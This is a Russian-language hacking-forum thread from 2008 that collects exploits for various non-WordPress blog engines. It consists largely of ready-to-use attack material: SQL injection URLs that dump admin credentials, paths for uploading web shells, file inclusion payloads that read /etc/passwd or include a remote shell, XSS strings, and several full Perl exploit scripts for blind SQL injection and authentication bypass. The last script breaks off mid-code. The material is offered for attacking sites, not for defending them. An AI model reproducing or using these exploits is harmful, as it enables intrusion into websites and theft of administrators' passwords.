Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   [ Обзор уязвимостей в блогах (кроме WР) ] (https://forum.antichat.xyz/showthread.php?t=73154)

Ded MustD!e 09.06.2008 05:21
[ Обзор уязвимостей в блогах (кроме WР) ]
 
Раздел называется "Движки CMS и блоги", а вот обзора по блогам, кроме Word Press, я не увидел, будем исправлять)))

FlashBlog beta0.31 Remote File Upload

Заливаем шелл здесь:

Цитата:
http://[site.com]/admin/Editor/imgupload.php
Просматриваем здесь:

Цитата:
http://[site.com]/tus_imagenes/shell.php
FlashBlog SQL Injection

Код:
http://[host]/[path]//php/leer_comentarios.php?articulo_id=-1/**/union/**/select/**/1,2,3,4,5,concat(email,0x203a3a20,NombreUsuario,0x203a3a20,Password),7,8,9,10,11,12,13,14,15,16,17/**/from/**/usuarios/*
Archangel Weblog 0.90.02 Admin Auth Bypass, Upload File, Blind SQL Injection

PHP код:
#!/usr/bin/perl -w
# Portal   :  Archangel Weblog 0.90.02
# Download :  http://www.archangelmgt.com/Archangel_Weblog_v090_02.zip
#  exploit aported password  crypted
#  mgharba :d:d:d:d
########################################
#[*] Founded &  Exploited by : Stack-Terrorist [v40]
#[*] Contact: Ev!L =>> see down
#[*] Greetz : Houssamix & Djekmani & Jadi & iuoisn & Str0ke & All muslims HaCkeRs  :)
########################################
#----------------------------------------------------------------------------#
########################################
# * TITLE:          PerlSploit Class
# * REQUIREMENTS:   PHP 4 / PHP 5
# * VERSION:        v.1
# * LICENSE:        GNU General Public License
# * ORIGINAL URL:   http://www.v4-Team/v4.txt
# * FILENAME:       PerlSploitClass.pl
# *
# * CONTACT:        dj-moad@hotmail.fr (french / english / arabic / moroco Darija :d )
# * THNX : AllaH
# * GREETZ:         Houssamix & Djekmani
########################################
#----------------------------------------------------------------------------#
########################################
system("color a");
print "\t\t############################################################\n\n";
print "\t\t#   Archangel Weblog  <= 0.90.02 - Remote SQL Inj Exploit  #\n\n";
print "\t\t#                 by Stack-Terrorist [v40]                 #\n\n";
print "\t\t############################################################\n\n";
########################################
#----------------------------------------------------------------------------#
########################################
use LWP::UserAgent;
die "Example: perl $0 http://victim.com/path/\n" unless @ARGV;
system("color f");
########################################
#----------------------------------------------------------------------------#
########################################
#the username of  news manages
$user="author_login";
#the pasword of  news manages
$pass="author_password";
#the tables of news manages
$tab="authors";
########################################
#----------------------------------------------------------------------------#
########################################
$b LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
########################################
#----------------------------------------------------------------------------#
########################################
$host $ARGV[0] . "/index.php?post_id=-1'/**/union/**/select/**/12,concat(CHAR(60,117,115,101,114,62),".$user.",CHAR(60,117,115,101,114,62),".$pass."),32,4,5,6,3/**/from/**/".$tab."/**/where/**/author_id=1/*";

$res $b->request(HTTP::Request->new(GET=>$host));
$answer $res->content;
########################################
#----------------------------------------------------------------------------#
########################################
if ($answer =~ /<user>(.*?)<user>/){
        print "\nBrought to you by v4-team.com...\n";
        print "\n[+] Admin User : $1";
}
########################################
#----------------------------------------------------------------------------#
########################################
if ($answer =~/([0-9a-fA-F]{32})/){print "\n[+] Admin Hash : $1\n\n";
print "\t\t#   Exploit has ben aported user and password hash   #\n\n";}

else{print "\n[-] Exploit Failed...\n";}
########################################
#-------------------Exploit exploited by Stack-Terrorist --------------------#
######################################## 
miniBloggie 1.0 Delete Post

PHP код:
if (isset($_GET['post_id'])) $post_id $_GET['post_id'];
if (isset($_GET['confirm'])) $confirm $_GET['confirm'];
[...]
elseif ($confirm=="yes") {
[...]
$sql "DELETE FROM blogdata WHERE post_id=$post_id";
$query mysql_query($sql) or die("Cannot query the database.<br>" mysql_error()); 
Vulner:
Цитата:
http://site/del.php?post_id=[postid]&confirm=yes
Example:
Цитата:
http://127.0.0.1/del.php?post_id=1&confirm=yes
Smartblog SQL Injection
Код:
http://localhost/[script_path]/index.php?idt=-1 UNION SELECT 1,concat_ws(0x3a,pseudo,pass),3,4,5,6,7,8,9 FROM smb_user--
BlogMe PHP SQL Injection
Код:
http://localhost/[BlogMe_path]/comments.php?id=-1 UNION SELECT 1,2,3,4,5,6,aes_decrypt(aes_encrypt(user(),0x71),0x71)--
BlogWorx 1.0 SQL Injection
Код:
http://www.example.com/lab/blogworx1.0/view.asp?id=1+union+select+0,1,2,Password,UserName,5,6+from+Users
Blog PixelMotion SQL Injection
Код:
http://www.xxx.org/blog/index.php?categorie=-1+union+select+0,1,2,database(),4,5,6/*
Blog PixelMotion File Upload

Заливаем шелл сюда:
Цитата:
http://[Site]/[script]/admin/modif_config.php
Получаем здесь:
Цитата:
http://[Site]/[script]/templateZip/[shell]
Blog PixelMotion Database Backup
Цитата:
http://[Site]/[script]/admin/sauvBase.php
Таблица мемберов называется blog_utilisateurs

LulieBlog 1.2 Admin Auth Bypass, Upload File, Blind SQL Injection

PHP код:
# LulieBlog 1.2 Multiple Remote Vulnerabilities (Admin Auth Bypass, Upload File, Blind SQL Injection)
# Author: Cod3rZ
# Site: http://cod3rz.helloweb.eu
# Site: http://devilsnight.altervista.org
# Date: 06/05/2008 [dd/mm/yyyy]

# Admin Auth Bypass:

# Modify Articles: send a request to site/Admin/article_modif2.php with:
# titre=[titlearticle]&text=[text]&media=[media]&id=[idarticle]

# New Article: send a request to site/Admin/article_suppr.php with:
# titre=[titlearticle]&text=[text]&media=[media]

# Change Admin Username & Blog Title: send a request to site/Admin/util_modif.php with:
# pseudo=[newadminnick]&titre=[newblogtitle]

# Change Admin Email: send a request to site/Admin/mails_modif.php with:
# recevmail=1&emetteur=[email]&desti=[email]

# PS: All administration variables are vulnerables!

# Upload File (Simple Exploit):
 <html>
 <head><title>LulieBlog Uploader http://cod3rz.helloweb.eu</title></head>
 <body bgcolor='#000000' text='#FFFFFF'>
 <form name='cod3rz' action='site/Admin/media_insert.php' method='post' enctype='multipart/form-data'>
 <font size='1' face='Verdana'>
 <center>
 Title:<br>
 <input type='text' name='titre'><br>
 File:<br>
 <input type='file' name='fichier'><br>
 <input type='hidden' name='lieu' value='0'>
 Type File:<br> <select name='typemedia'>
           <option value='1'>Image</option>
           <option value='2'>Flash</option>
           <option value='3'>Archive</option>
           <option value='4'>Vid</option>
           <option value='6'>Pr&#233;sentation PowerPoint</option>
           <option value='7'>Fichiers PDF</option>
           </select><br>
 <input type='submit' name ='upload' value='Upload'></font></center>
 </form></body></html>

# End 


# Blind SQL Injection Exploit:

#!/usr/bin/perl
# LulieBlog 1.2 Remote Blind SQL Injection Exploit
# Author : Cod3rZ
# Site : http://cod3rz.helloweb.eu
# Site : http://devilsnight.altervista.org
# Usage : perl lb.pl site

use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;

$ua LWP::UserAgent->new;

$site "http://127.0.0.1/blog";
if(!$site) { &usage; }
@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);

sub usage {
 print " Usage: perl ig.pl site \n";
 print " Ex.: perl ig.pl http://127.0.0.1 \n";
}
sub request {
 $var $_[0];
 $start Time::HiRes::time();
 $response $ua->request(GET $var,=> $var);
 $response->is_success() || print("$!\n");
 $end Time::HiRes::time();
 $time $end $start;
 return $time
}
sub refresh{
 system("cls");
 print " -------------------------------------------------\n";
 print " LulieBlog 1.2 Remote Blind Sql Injection Exploit \n";
 print " Powered by Cod3rZ                                \n";
 print " http://cod3rz.helloweb.eu                        \n";
 print " -------------------------------------------------\n";
 print " Please Wait..                                    \n";
 print " Hash : " $_[3] . "                             \n";
 print " -------------------------------------------------\n";
}
for ($i 1$i 33$i++)
 {
  for ($j 0$j 16$j++)
   {
 $var $site."/visumedia.php?id=-1' OR (SELECT IF((ASCII(SUBSTRING(`valeur_parametre`,".$i.",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),0) FROM lulieblog_parametres WHERE nom_parametre='pass')/*";

system('pause');
 $time request($var);
 refresh($host,$timedefault,$j,$hash,$time,$i);
if($time 4)
{
 $time request($var);
 refresh($host,$timedefault,$j,$hash,$time,$i);
 $hash .= chr($array[$j]);
 refresh($host,$timedefault,$j,$hash,$time,$i);
 $j=200;
}}

if($i == && !$hash)
{
 print " Failed                                           \n";
 print " -------------------------------------------------\n";
 die();
}
if($i == 32) {
 print " Exploit Terminated                               \n";
 print " -------------------------------------------------\n ";
 system('pause');
}}

# http://cod3rz.helloweb.eu 
Battle Blog <= 1.25 SQL Injection

Для MS SQL Server:
Цитата:
/comment.asp?entry=22+and+1=convert(int,(select+@@v ersion))--
Для Ms ACCESS:
Цитата:
/comment.asp?entry=IIF((select%20mid(last(Name),1,1 )%20from%20(select%20top%2010%20Namee%20from%20MSy sObjects))='a',0,'done')%00
Blogator-script 0.95 Change User Password

Уязвимый код:
PHP код:
line 23$id=$_GET['a'];
line 24:$email=$_GET['b'];
line 25$mdp=$_GET['c'];
.....
line 27$sql_change_pass=mysql_query("UPDATE membre SET pass = '$mdp' WHERE id_membre = '$id' AND email LIKE '$email' LIMIT 1"); 
Код:
http://www.site.com/_blogadata/include/init_pass2.php?c=[newpass]&a=[user id]&b=%
Blogator-script 0.95 SQL Injection

Уязвимый код:
PHP код:
line 27$id_art=$_GET['id_art'];
......
line 34$sql_res=mysql_query("SELECT sond_rep, votes_H, votes_F FROM sondage_rep WHERE id_sond = $id_art ORDER BY ordre"); 
Код:
http://www.site.com/_blogadata/include/sond_result.php?id_art=-99999/**/union/**/select/**/concat(pseudo,0x3a,pass,char(58),email),2,3/**/from/**/membre/**/where/**/id_membre=1/*
Blogator-script 0.95 File Inclusion

Цитата:
http://localhost/[script]/_blogadata/include/struct_admin.php?incl_page=http://localhost/shell.txt?
http://localhost/[script]/_blogadata/include/struct_admin_blog.php?incl_page=http://localhost/shell.txt?
http://localhost/[script]/_blogadata/include/struct_main.php?incl_page=http://localhost/shell.txt?
eggBlog 4.0 SQL Injection

PHP код:
# Author:    __GiReX__
# mySite:    girex.altervista.org
# Date:        27/03/2008 - 1/04/2008 Added exploit for str0ke 

# CMS:         eggBlog 4.0
# Site:        eggblog.net

# Bug:         SQL Injection (cookie vars)
# Type:            1 - Admin/User Authentication Bypass

# Bug2:        Blind SQL Injection (same vars-query)
# Type:        Password retrieve exploit

# Var :        $_COOKIE['email], $_COOKIE['password']
# Need:        magic_quotes_gpc = Off

# File: index.php
    require_once "_lib/global.php";
    ...
    eb_pre();

# File: /_lib/globals.php
    require_once '_lib/user.php';
    ...
    function eb_pre() {
    ...
    if(isset($_COOKIE['email']) && isset($_COOKIE['password']) && !isset($_SESSION['user_id'])) eb_login($_COOKIE['email'],$_COOKIE['password'],1);

# Let we see function eb_login

# File: /_lib/user.php
    function eb_login($email,$password,$key) {
    ...
    if($key==0$password=md5($password);

# Our $key is set to 1 so the password will not cprypted

    $sql="SELECT user_id FROM eb_users WHERE user_email=\"".$email."\" AND   md5(user_password)=\"".$password."\"";
    $query=mysql_query($sql);

# I have no words, 2 vars not sanizated into a SELECT query

PoC 1:
    GET [PATH]/index.php HTTP/1.1
    Host: [HOST]
    ...
    Cookieemail=@" OR "1password=@" OR "1

# With this you will be authenticated with the fist record of table eb_user

PoC 2:
    GET [PATH]/index.php HTTP/1.1
    Host: [HOST]
    ...
    Cookieemail=@" OR "1password=@" OR "1" AND user_id="[VICTIM_USER_ID]

# For anybody you want

##############################################################################################################
# Start Blind SQL Injection / Password retrieve exploit                                 #
# NOTE:    Password is in plain-text so take  a coffe...                                 #
##############################################################################################################
#!/usr/bin/perl -w

# EggBlog v4.0 Blind SQL Injection
# Password Retrieve Exploit
# Coded by __GiReX__

use LWP::UserAgent;
use HTTP::Request;

if(not defined $ARGV[0])
{
    print "usage: perl $0 [host] [path]\n";
    print "example: perl $0 localhost /eggblog/\n";
    exit;
}

my $client = new LWP::UserAgent;
my @cset = (32..1260); 
my ($i$j$hash) = (01undef);
 
my $host = ($ARGV[0] =~ /^http:\/\//) ?  $ARGV[0]:  'http://' . $ARGV[0];
   $host .= $ARGV[1unless not defined $ARGV[1];

banner();
check_vuln($host) or die "[-] Site not vulnerable\n";


while($i != $#cset)
{  
   for($i 0$i <= $#cset; $i++)
   {
      my ($pre_time$post_time) = time();    
    
    $rv check_char($host$cset[$i], $j);
    $post_time time();    
    
     info(chr($cset[$i]), $post_time $pre_time$hash);
    
     if($post_time $pre_time and $rv)
     {
        $hash .= chr($cset[$i]); 
        last;
     }
   }

  $j++;
}

print "\n". (defined $hash) ?
      "[+] Admin password: ${hash} \n":
      "[-] Exploit mistake: please check benchmark and charset\n";

print "[+] Exploit terminated\n\n";



sub banner
{
   print "\n";
   print "[+] EggBlog v4.0 Blind SQL Injection\n";
   print "[+] Password Retrieve Exploit\n";
   print "[+] Coded by __GiReX__\n";
   print "\n";
}

sub check_vuln
{
  my ($target$res) = @_;
     
     $get = new HTTP::Request(GET$target);
     $get->header('Cookie' => 'email=-1" WHERE X#; password=aaaaaaa;');
     $res $client->request($get);
     
       if($res->is_success
       {
      return if $res->content =~ /<b>Warning<\/b>:/;
       }
  
  return 0;
}

sub check_char
{
  my ($target$char$n$res) = @_;
   
    $get->header(Cookie => 
            'email=-1"+AND+'.
            'CASE+WHEN'.
            '((SELECT(ASCII(SUBSTRING(user_password,'.$n.',1)))FROM+eb_users+WHERE+user_id=1)='.$char.')'.
            'THEN+benchmark(90000000,CHAR(0))+'.
            'END#; '.
            'password=dummy_psw'); 

    $res $client->request($get);
 
return $res->is_success;
}

sub info
{
  my ($char$delay$hash) = @_;
    print STDOUT "[+] Admin password: ${hash}".$char."\r" unless not defined $hash;
    # print STDOUT "[+] Char: ${char} - Delay: ${delay}\r";
    $| = 1;
}

# milw0rm.com [2008-04-01] 
З.Ы. Буду постепенно добавлять уязвимости....

Ded MustD!e 09.06.2008 05:33
Neat weblog 0.2 SQL Injection

PHP код:
#!/usr/bin/perl
#####################################################################################
####                            Neat weblog 0.2                                  ####
####                        SQL Injection Exploit                                ####
#####################################################################################
#                                                                                   #
#Discovered by : IRCRASH (Dr.Crash)                                                 #
#Exploited By : Dr.Crash                                                            #
#IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm                               #
#                                                                                   #
#####################################################################################
#                                                                                   #
#Script Download : http://kent.dl.sourceforge.net/sourceforge/neat-web/neat0.2.zip  #
#                                                                                   #
#####################################################################################
#                                   < SQL >                                         #
#SQL Address : http://Sitename/index.php?action=show&articleId=99999%27union/**/select/**/0,concat(user,0x120,password),2,3,4,5,6,7,8/**/from/**/neat_users/**/where+id=1/*
#                                                                                   #
#####################################################################################
#                         Our site : Http://IRCRASH.COM                             #
#####################################################################################

use LWP;
use HTTP::Request;
use Getopt::Long;
 
 
sub header
{
print "
****************************************************
*      Neat weblog 0.2 Sql Injection exploit       *
****************************************************
*AUTHOR : IRCRASH                                  *
*Discovered by : IRCRASH (Dr.Crash)                *
*Our Site : IRCRASH.COM                            *
****************************************************";
}
 
sub usage
{
  print "
* Usage : perl $0 -url http://Sitename/
****************************************************
";
}                                                                                  
 
 
my %parameter = ();
GetOptions(\%parameter"url=s");
 
$url $parameter{"url"};
 
if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url."/";}
if($url !~ /http:\/\//){$url = "http://".$url;}
$vul "/index.php?action=show&articleId=99999%27union/**/select/**/0,concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),2,3,4,5,6,7,8/**/from/**/neat_users/**/where+id=1/*";
sub Exploit()
{
$requestpage $url.$vul;
print "Requesting Page is ".$url."\n";
 
my $req  HTTP::Request->new("POST",$requestpage);
$ua LWP::UserAgent->new;
$ua->agent'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
$req->referer($url);
$req->referer("http://IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);
 
$response $ua->request($req);
$content $response->content;
$header $response->headers_as_string();
 
#Debug Modus delete # at beginning of next line
#print $content;
 
@name split(/Login:/,$content);
$name = @name[1];
@name split(/<enduser>/,$name);
$name = @name[0];
 
@password split(/Password:/,$content);
$password = @password[1];
@password split(/<endpass>/,$password);
$password = @password[0];

if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}
 
print "Username: ".$name."\n";
print "Password: " .$password."\n\n";
print "Crack Password And Login In : $url/index.php?action=login\n";
print "Enjoy My friend .....\n";
 
}
 
#Starting;
print "
****************************************************
*      Neat weblog 0.2 Sql Injection exploit       *
****************************************************
*AUTHOR : IRCRASH                                  *
*Discovered by : IRCRASH (Dr.Crash)                *
*Our Site : IRCRASH.COM                            *
****************************************************";
print "\n\nExploiting...\n";
Exploit();

# milw0rm.com [2008-03-31] 
Lightblog 9.6 local file inclusion

Код:
http://localhost/LightBlog9.6/view_member.php?username=../../../../../../../../../../etc/passwd%00
Artmedic weblog local file inclusion

Цитата:
http://localhost/artmedic_weblog/index.php?ta=../../../../../../../../../../etc/passwd%00
http://localhost/artmedic_weblog/artmedic_print.php?date=../../../../../../../../../../etc/passwd%00
A-Blog V.2 (id) XSS / SQL Injection

PHP код:
#!/usr/bin/perl
#####################################################################################
####                                 A-Blog V.2                                  ####
####             Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS)     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH                                                                   #
#Discovered by : Dr.Crash                                                           #
#Exploited By : Dr.Crash                                                            #
#IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm                               #
#                                                                                   #
#####################################################################################
#                                                                                   #
#Script Download : http://heanet.dl.sourceforge.net/sourceforge/a-blog/A-BlogV2.rar #
#                                                                                   #
#####################################################################################
#                                   < XSS >                                         #
#XSS Address : http://Sitename/search.php?words=<script>alert(document.cookie);</script>&submit=Go
#                                                                                   #
#####################################################################################
#                                   < SQL >                                         #
#SQL Address : http://Sitename/blog.php?view=news&id=9999%27union/**/select/**/CoNcAt(0x4c6f67696e3a,name,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)/**/from/**/site_administrators/*
# Help : See Username And Password In Site Title
#                                                                                   #
#####################################################################################
#                         Our site : Http://IRCRASH.COM                             #
#####################################################################################

use LWP;
use HTTP::Request;
use Getopt::Long;
 
 
sub header
{
print "
****************************************************
*          A-Blog V.2 Sql Injection exploit        *
****************************************************
*AUTHOR : IRCRASH                                  *
*Discovered by : Dr.Crash                          *
*Exploited by : Dr.Crash                           *
*Our Site : IRCRASH.COM                            *
****************************************************";
}
 
sub usage
{
  print "
* Usage : perl $0 -url http://Sitename/
****************************************************
";
}                                                                                  
 
 
my %parameter = ();
GetOptions(\%parameter"url=s");
 
$url $parameter{"url"};
 
if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url."/";}
if($url !~ /http:\/\//){$url = "http://".$url;}
$vul "blog.php?view=news&id=9999%27union/**/select/**/CoNcAt(0x4c6f67696e3a,name,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)/**/from/**/site_administrators/*";
sub Exploit()
{
$requestpage $url.$vul;
print "Requesting Page is ".$url."\n";
 
my $req  HTTP::Request->new("POST",$requestpage);
$ua LWP::UserAgent->new;
$ua->agent'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
$req->referer($url);
$req->referer("http://IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);
 
$response $ua->request($req);
$content $response->content;
$header $response->headers_as_string();
 
#Debug Modus delete # at beginning of next line
#print $content;
 
@name split(/Login:/,$content);
$name = @name[1];
@name split(/<enduser>/,$name);
$name = @name[0];
 
@password split(/Password:/,$content);
$password = @password[1];
@password split(/<endpass>/,$password);
$password = @password[0];

if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}
 
print "Username: ".$name."\n";
print "Password: " .$password."\n\n";
print "Crack Password And Login In : $url/admin.php\n";
print "Enjoy My friend .....\n";
 
}
 
#Starting;
print "
****************************************************
*          A-Blog V.2 Sql Injection exploit        *
****************************************************
*AUTHOR : IRCRASH                                  *
*Discovered by : Dr.Crash                          *
*Exploited by : Dr.Crash                           *
*Our Site : IRCRASH.COM                            *
****************************************************";
print "\n\nExploiting...\n";
Exploit();

# milw0rm.com [2008-02-03] 
BlogPHP v.2 (id) XSS / SQL Injection

PHP код:
#!/usr/bin/perl
#####################################################################################
####                                 BlogPHP V.2                                 ####
####             Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS)     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH                                                                   #
#Discovered by : Dr.Crash                                                           #
#Exploited By : Dr.Crash                                                            #
#IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm                               #
#                                                                                   #
#####################################################################################
#                                                                                   #
#Script Download : http://puzzle.dl.sourceforge.net/sourceforge/blogphpscript/BlogPHPv2.zip
#                                                                                   #
#####################################################################################
#                                   < XSS >                                         #
#XSS Address : http://Sitename/index.php?search=<script>alert(document.cookie);</script>
#                                                                                   #
#####################################################################################
#                                   < SQL >                                         #
#SQL Address : http://Sitename/index.php?act=page&id=999999999%27union/**/select/**/0,1,CoNcAt(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),3,4/**/from/**/blogphp_users/*
#                                                                                   #
#####################################################################################
#                         Our site : Http://IRCRASH.COM                             #
#####################################################################################

use LWP;
use HTTP::Request;
use Getopt::Long;
 
 
sub header
{
print "
****************************************************
*        SBlogPHP v.2 Sql Injection exploit        *
****************************************************
*AUTHOR : IRCRASH                                  *
*Discovered by : Dr.Crash                          *
*Exploited by : Dr.Crash                           *
*Our Site : IRCRASH.COM                            *
****************************************************";
}
 
sub usage
{
  print "
* Usage : perl $0 -url http://Sitename/
****************************************************
";
}                                                                                  
 
 
my %parameter = ();
GetOptions(\%parameter"url=s");
 
$url $parameter{"url"};
 
if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url."/";}
if($url !~ /http:\/\//){$url = "http://".$url;}
$vul "/index.php?act=page&id=999999999%27union/**/select/**/0,1,CoNcAt(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),3,4/**/from/**/blogphp_users/*";
sub Exploit()
{
$requestpage $url.$vul;
print "Requesting Page is ".$url."\n";
 
my $req  HTTP::Request->new("POST",$requestpage);
$ua LWP::UserAgent->new;
$ua->agent'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("http://IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);
 
$response $ua->request($req);
$content $response->content;
$header $response->headers_as_string();
 
#Debug Modus delete # at beginning of next line
#print $content;
 
@name split(/Login:/,$content);
$name = @name[1];
@name split(/<enduser>/,$name);
$name = @name[0];
 
@password split(/Password:/,$content);
$password = @password[1];
@password split(/<endpass>/,$password);
$password = @password[0];

if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}
 
print "Username: ".$name."\n";
print "Password: " .$password."\n\n";
print "Crack Md5 Password And Login In : $url/login.html\n";
print "Enjoy My friend .....\n";
 
}
 
#Starting;
print "
****************************************************
*        SBlogPHP v.2 Sql Injection exploit        *
****************************************************
*AUTHOR : IRCRASH                                  *
*Discovered by : Dr.Crash                          *
*Exploited by : Dr.Crash                           *
*Our Site : IRCRASH.COM                            *
****************************************************";
print "\n\nExploiting...\n";
Exploit();

# milw0rm.com [2008-02-02] 
LightBlog 9.5 File Upload

Заливаем шелл:
Цитата:
http://localhost/light/cp_upload_image.php
Просматриваем:
Цитата:
http://localhost/light/images/shell.php
LulieBlog Version 1.02 Sql Injection

Код:
http://Sitename/voircom.php?id=-1%27union/**/select/**/0,concat(nom_parametre,0x3a,0x3a,valeur_parametre),2,3,4,5/**/from/**/lulieblog_parametres/*
Mooseguy Blog System 1.0 SQL Injection

Уязвимый код:

PHP код:
<?php
   $month $_GET['month'];
   $result mysql_query("SELECT * FROM blog WHERE posted='$month' ORDER BY id DESC") or die("HELP QUERY BROKEN");
   ...
Код:
http://[target]/[path]/blog.php?month='+union+select+1,2,3,4,5,concat_ws(0x3a,id,uname,upass),7,8+from+users/*
Blogcms 4.2.1b (SQL/XSS)

Код:
http://[server]/[installdir]/index.php?query=asd&blogid=1,1)+union+select+1,2,user(),database(),mname,6,7,8,9,10,11,mpassword,13,14,15+from+nucleus_member/*
Цитата:
http://[server]/[installdir]/photo/admin.php/"><script>alert('DSECRG_XSS')</script>
http://[server]/[installdir]/photo/index.php/"><script>alert('DSECRG_XSS')</script>

Ded MustD!e 09.06.2008 05:44
Eggblog <= 3.1.0 Cookies SQL Injection

PHP код:
#!/usr/bin/perl

    use Tk;
    use Tk::BrowseEntry;
    use Tk::DialogBox;
    use LWP::UserAgent;

    $mw = new MainWindow(title => "UnderWHAT?!" );

    $mw->geometry '420x343' ) ;
    $mw->resizable(0,0);

    $mw->Label(-text => '', -font => '{Verdana} 8',-foreground=>'red')->pack();
    $mw->Label(-text => 'eggblog <= 3.1.0 Cookies Sql Injection', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack();
    $mw->Label(-text => 'it will take about half an hour to get hashed password', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack();
    $mw->Label(-text => 'you need magic_quotes_gpc turned off and mysql version higher that 4.1', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack();
    $mw->Label(-text => '', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack();


    $fleft  $mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ;
    $fright $mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ;

    $url      'http://test2.ru/eggblog/home/index.php';
    $user_id  '1';
    $prefix   'eggblog_';
    $table    'users';
    $column   'user_password';
    $report   '';
    $group    1;
    $curr_user 0;
    


    $fleft->Label ( -text => 'Path to forum index: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
    $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$url) ->pack ( -side => "top" , -anchor => 'w' ) ;

    $fleft->Label ( -text => 'User ID: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ;
    $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$user_id) ->pack ( -side => "top" , -anchor => 'w' ) ;

    $fleft->Label ( -text => 'Database tables prefix: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
    $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$prefix) ->pack ( -side => "top" , -anchor => 'w' ) ;

    $fleft->Label ( -text => 'Returned hash: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
    $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$report) ->pack ( -side => "top" , -anchor => 'w' ) ;

    $fright->Label( -text => ' ')->pack();

    $fright->Button(-text    => 'Test blog vulnerability',
                    -relief => "groove",
                    -width => '30',
                    -font => '{Verdana} 8 bold',
                    -activeforeground => 'red',
                    -command => \&test_vuln
                   )->pack();
    
    $fright->Button(-text    => 'Get hash from database',
                    -relief => "groove",
                    -width => '30',
                    -font => '{Verdana} 8 bold',
                    -activeforeground => 'red',
                    -command => \&get_hash
                   )->pack();
                   
                   
    $mw   ->Label(-text => '', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
    $fleft->Label(-text => '!', -font => '{Webdings} 22')->pack();
    $fleft->Label(-text => 'eggblog 3.1.0', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
    $fleft->Label(-text => 'cookie sql injection ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
    $fleft->Label(-text => 'mysql char bruteforcing ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
    $fleft->Label(-text => 'bug in auth function ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
    $fleft->Label(-text => 'by gemaglabin and Elekt  ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
    $fleft->Label(-text => '( mafia of antichat.ru ) ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
    $fleft->Label(-text => ' 2007.02.04 ( fixed ) ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
    $fright->Label(-text => '', -font => '{Verdana} 3 bold',-foreground=>'red')->pack();
    $print=$fright->Text(-width=>35,-height=>5,-wrap=>"word")->pack(-side=>"top",-anchor=>"s");
    
    MainLoop();
    
    sub get_hash()
    {
        srand();
        $xpl LWP::UserAgent->new( ) or die;
        $InfoWindow=$mw->DialogBox(-title   => 'get hash from database', -buttons => ["OK"]);
        $i 1;
        $b 0;
        $report '';
        my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
        $print->insert('end',"- Start [$hour:$min:$sec]\n");
        my @brutearray=qw(48 49 50 51 52 53 54 55 56 57 58 97 98 99 100 101 102);
        while (length($report)<32)
        {
            $num $brutearray[$b];
            $ret get_pchar();
            if($ret 0)
            {
                $print->insert('end',"- char [$num] = ".chr($num)."\n");
                $report .= chr($num);
                $b 0;
                $i $i +1;
                $mw->update(); 
                break;
            }
            else
            {
                $b $b +1;
            }
        }
        my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
        $print->insert('end',"- Finish [$hour:$min:$sec]");
    }
        
    sub get_pchar()
    {
